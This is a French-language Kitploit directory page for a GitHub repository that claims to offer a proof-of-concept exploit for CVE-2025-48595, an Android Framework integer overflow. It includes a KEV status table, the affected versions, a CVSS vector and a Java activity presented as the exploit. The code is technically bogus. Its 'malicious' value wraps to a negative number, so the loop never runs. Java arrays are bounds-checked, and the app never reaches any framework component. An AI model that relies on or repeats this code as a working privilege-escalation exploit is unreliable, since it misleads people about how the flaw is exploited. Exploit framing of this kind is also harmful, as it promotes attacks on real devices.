Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-48595-Android-Framework-Integer-Overflow- — VE-2025-48595 est une vulnérabilité de **dépassement d'entier (integer overflow)** dans plusieurs emplacements du Framework Android. | Kitploit
Outils/GitHubGitHub/fevar54/cve-2025-48595-android-framework-integer-overflow-
Sécurité AndroidEscalade de PrivilègesAnalyse des VulnérabilitésExploitationSécurité MobileExploitation de Binaires
GitHubfevar54/cve-2025-48595-android-framework-integer-overflow-

CVE-2025-48595-Android-Framework-Integer-Overflow-

VE-2025-48595 est une vulnérabilité de **dépassement d'entier (integer overflow)** dans plusieurs emplacements du Framework Android.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
12il y a 2 moisPas encore vérifié

CVE-2025-48595 - Vulnérabilité de débordement d'entier du Framework Android

Critical CVE KEV

Description

CVE-2025-48595 est une vulnérabilité de débordement d'entier (integer overflow) dans plusieurs emplacements du Framework Android. Cette faille permet l'exécution de code menant à une élévation locale de privilèges sans nécessité de privilèges d'exécution supplémentaires. Aucune interaction de l'utilisateur n'est requise pour l'exploitation.

État critique

ÉlémentÉtat
Exploitation active✅ Confirmée (exploitation limitée et segmentée)
Dans le catalogue KEV de CISA✅ Oui
Date d'ajout au KEV2026-06-02
Date d'expiration2026-06-05
Correctif disponible✅ Oui

Systèmes affectés

Version d'AndroidAffectée ?
Android 14✅ Oui
Android 15✅ Oui
Android 16✅ Oui
Android 16 QPR2✅ Oui

Vecteur d'attaque

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

text

Preuve de concept (POC)

Description du POC

Le code suivant démontre l'exploitation de la vulnérabilité en envoyant des données malveillantes qui provoquent un débordement d'entier dans le Framework Android, permettant l'exécution de code arbitraire avec des privilèges élevés.

root@kitploit:~
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable

package com.example.cve202548595;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    
    private static final String TAG = "CVE-2025-48595";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        // POC: Desencadenar desbordamiento de entero
        triggerIntegerOverflow();
    }
    
    private void triggerIntegerOverflow() {
        try {
            // Valor que causa el desbordamiento (más allá del límite esperado)
            int maliciousValue = Integer.MAX_VALUE + 1;
            
            // Construir intent malicioso
            android.content.Intent intent = new android.content.Intent();
            intent.putExtra("malicious_data", maliciousValue);
            
            // Forzar operación con desbordamiento
            int result = processMaliciousData(maliciousValue);
            
            Log.i(TAG, "Desbordamiento activado exitosamente");
            
        } catch (Exception e) {
            Log.e(TAG, "Error: " + e.getMessage());
        }
    }
    
    private int processMaliciousData(int value) {
        // El desbordamiento aquí permite la corrupción de memoria
        int[] buffer = new int[1024];
        
        // El valor malicioso excede los límites del buffer
        // debido al desbordamiento de entero
        for (int i = 0; i < value; i++) {
            buffer[i] = i;  // Esta línea causa overflow
        }
        
        return buffer[0];
    }
}
Télécharger l’outil
MétriqueValeur
Vecteur d'attaqueLocal (AV:L)
Complexité de l'attaqueBasse (AC:L)
Privilèges requisAucun (PR:N)
Interaction de l'utilisateurAucune (UI:N)
Impact sur la confidentialitéÉlevé (C:H)
Impact sur l'intégritéÉlevé (I:H)
Impact sur la disponibilitéÉlevé (A:H)